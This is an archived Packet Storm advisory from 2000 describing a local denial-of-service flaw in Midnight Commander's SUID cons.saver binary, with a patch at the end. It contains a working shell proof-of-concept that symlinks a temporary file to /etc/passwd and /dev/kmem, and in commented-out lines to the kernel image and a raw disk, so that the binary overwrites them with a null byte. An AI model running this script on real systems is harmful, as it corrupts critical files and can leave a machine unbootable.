exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cons.saver.txt

cons.saver.txt
Posted Nov 13, 2000
Authored by Z33d

Many systems have the SUID bit set on cons.saver (/usr/lib/mc/bin/cons.saver), part of the Midnight Commander package. A denial of service vulnerability has been found which allows local users to overwrite a null character to any symlinkable file. Includes proof of concept exploit and a patch for cons.saver.

tags | exploit, denial of service, local, proof of concept
SHA-256 | 65e644ff14594df49724ef14d399326c53243a989d5213911a2bd76b3885227c

cons.saver.txt

Change Mirror Download
   Subject:    Problems with cons.saver
Author: Maurycy Prodeus < z33d@eth-security.net >

Hi,
Many systems have a suid on cons.saver which is part of midnight commander
package. Standard location of this binary is /usr/lib/mc/bin/cons.saver.
There is a bug, which allows luser to write '\0' char to any symlinkable file
in system. So it can be very destructive, I wrote simple example of DoS.

Technical details ... it isn't common bug. Cons.saver doesn't check if
stdout is opened. Next, it checks if argv[1] is a terminal file.
First, file is opened with O_RDWR flag and then it checks if this file is
character device. When error occures, cons.saver doesn't close this file.
Later, NULL character is written to 1 fd. (our 'fake' stdout)

I wrote temporary patch, but Solar's OpenWall Patch should be enough.

- z33d

------------------------------------------------------------------------
I'm looking for job :: http://z33d.eth-security.net/job.html
------------------------------------------------------------------------

=> Proof of concept:

#!/bin/sh
# *---------------------------------------------------------*
# Slaughterhouse ver. 1.0 by z33d@eth-security.net (C) 2000 |
# Bloody, Midnight DoS ;> with suid cons.saver
# Dedicated to my lovely mother.
# : Greetz
# * (...) Oczy niebieskie (...)
# - y3t1 - twe zyczenie jest dla mnie rozkazem :)
# - wroclaw's killers <=> dyziu, decker, kanedaa, korie, viedzmin (...)
# - argante development team (lcamtuf,bulba,artur,marcin,bikappa,honey ...)
# - #sigsegv (funkysh, y3t1, cliph, detergent, kris, venglin ...)
# - sister of night
# - other ppl like mareczek, grubszy, karol, adam, wojtas, siebylnikov,
# slodka Asia (...) |
# *---------------------------------------------------------*

if [ -u /usr/lib/mc/bin/cons.saver ]; then
echo "Zdarza sie."
else
echo "Swoja matke przepros ..."
exit 0
fi
cat >/tmp/rzeznia.c <<_eof_
#include <stdio.h>
#include <unistd.h>
main(){ close(0); close(1);
execl("/usr/lib/mc/bin/cons.saver","cons.saver","/tmp/tty13",NULL);
printf("To jakies fatalne nieporozumienie...\n");}
_eof_

gcc /tmp/rzeznia.c -o /tmp/rzeznia
rm -f /tmp/rzeznia.c

if [ -x /tmp/rzeznia ]; then
echo "On naostrzyl juz noz ... mial rowek i trojkatny ksztalt"
else
echo "ZZZZZZz Zyz yzyzyyzyzyzyzyyy y y . . ."
exit 0
fi

ln -s /etc/passwd /tmp/tty13
/tmp/rzeznia
rm -f /tmp/tty13
ln -s /dev/kmem /tmp/tty13
/tmp/rzeznia
rm -f /tmp/tty13
# Uzyj w razie potrzeby ;>
# ln -s /boot/vmlinuz /tmp/tty13
# /tmp/rzeznia
# rm -f /tmp/tty13
# ln -s /dev/hda /tmp/tty13
# /tmp/rzeznia
echo "... "
echo " he passed away"
rm -f /tmp/rzeznia

=> My temporary patch

--- mc-4.5.42/src/cons.saver.c Mon Dec 6 18:50:02 1999
+++ mc-4.5.42/src/cons.saver.c.z33d Sun Nov 12 17:20:48 2000
@@ -116,12 +116,15 @@
if (fd == -1)
return -1;

- if (fstat (fd, &stat_buf) == -1)
+ if (fstat (fd, &stat_buf) == -1){
+ close(fd);
return -1;
+ }

/* Must be character device */
if (!S_ISCHR (stat_buf.st_mode)){
*msg = "Not a character device";
+ close(fd);
return -1;
}

@@ -132,17 +135,20 @@
/* Second time: must be console */
if ((stat_buf.st_rdev & 0xff00) != 0x0400){
*msg = "Not a console";
+ close(fd);
return -1;
}

if ((stat_buf.st_rdev & 0x00ff) > 63){
*msg = "Minor device number too big";
+ close(fd);
return -1;
}

/* Must be owned by the user */
if (stat_buf.st_uid != getuid ()){
*msg = "Not a owner";
+ close(fd);
return -1;
}
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close